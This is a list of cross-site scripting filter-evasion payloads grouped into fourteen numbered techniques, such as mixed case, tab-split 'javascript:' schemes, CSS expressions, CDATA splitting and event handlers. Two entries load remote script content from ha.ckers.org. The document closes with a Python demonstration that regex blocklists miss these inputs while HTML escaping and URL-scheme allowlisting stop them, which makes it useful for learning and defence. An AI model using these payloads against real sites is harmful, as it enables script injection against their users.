1. Change the character case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another extension in place of .js

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade (the breaks inside "javascript" below are a tab or a newline)

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> new line

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside a swf file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and let the browser reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
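
Nearly every entry in this list exists because some filter was written as a regular-expression blocklist. The Python below is an added example, not part of the original post: it runs a few constructed samples in the style of items 1, 5 and 6 against a naive blocklist, shows which ones get through (and that adding re.IGNORECASE only closes one of them), and then shows the two checks that actually hold up: entity-escaping output for the HTML context, and allowlisting the URL scheme for the src/href/url() sinks of item 14. The pattern names, helper functions and sample strings are this example's own assumptions, not any product's API.

```python
"""Why the evasions on this page defeat a regex blocklist, and what works instead.

Added example (not from the original post). The sample payloads are
constructed from the kinds of evasion the list describes; the filter
patterns and the two mitigation helpers are this example's own.
"""
import html
import re
from urllib.parse import urlparse

# Constructed inputs: one plain script tag plus three of the page's evasion styles.
SAMPLES = [
    "<script>alert(1)</script>",                     # what the blocklist was written for
    "<sCript>alert('d')</scRipT>",                   # item 1: mixed case
    '<SCRIPT/SRC="t.js"></SCRIPT>',                  # item 5: extra character in the tag
    "<img src=\"jav\tascr\nipt:alert('XSS3')\">",    # item 6: tab / newline inside the scheme
]

# A blocklist of the kind the page's payloads are written to slip past.
NAIVE = re.compile(r"<script>|javascript:")
# The usual "fix": ignore case. Still a blocklist, so still incomplete.
NAIVE_CI = re.compile(r"<script>|javascript:", re.IGNORECASE)


def evasions_missed(samples, pattern=NAIVE):
    """Return the samples that `pattern` fails to flag (the false negatives)."""
    return [s for s in samples if not pattern.search(s)]


def escape_for_html_text(s: str) -> str:
    """Output encoding for the HTML text / quoted-attribute context.

    The browser receives entities instead of markup, so every tag, quote and
    handler trick in the input is rendered as literal characters, not executed.
    """
    return html.escape(s, quote=True)


def is_safe_url(url: str) -> bool:
    """Scheme allowlist for src/href/url(), the item-14 sinks.

    Browsers drop tabs, newlines and other control characters inside the
    scheme before resolving it (item 6), so normalise the same way before
    parsing rather than relying on the URL parser to do it for you.
    Only http, https and relative URLs are accepted; javascript:, data:,
    vbscript: and anything else are rejected without having to be named.
    """
    cleaned = "".join(ch for ch in url.strip() if ord(ch) > 0x20)
    scheme = urlparse(cleaned).scheme.lower()
    return scheme in ("", "http", "https")


if __name__ == "__main__":
    for name, pat in (("naive", NAIVE), ("naive+ignorecase", NAIVE_CI)):
        missed = evasions_missed(SAMPLES, pat)
        print(f"{name}: blocked {len(SAMPLES) - len(missed)}/{len(SAMPLES)}, missed {missed!r}")
    for s in SAMPLES:
        print("escaped:", escape_for_html_text(s))
    for u in ("https://example.com/x.js", "/static/x.js",
              "jav\tascr\nipt:alert(1)", "JaVaScRiPt:alert(1)"):
        print(f"{u!r:32} -> {'allow' if is_safe_url(u) else 'reject'}")
```

The point of the two helpers is that neither one needs to know about any entry in this list: escaping makes the whole input inert in the HTML context, and the scheme allowlist only has to name what is permitted. A blocklist, by contrast, has to anticipate every trick above and every one that has not been published yet.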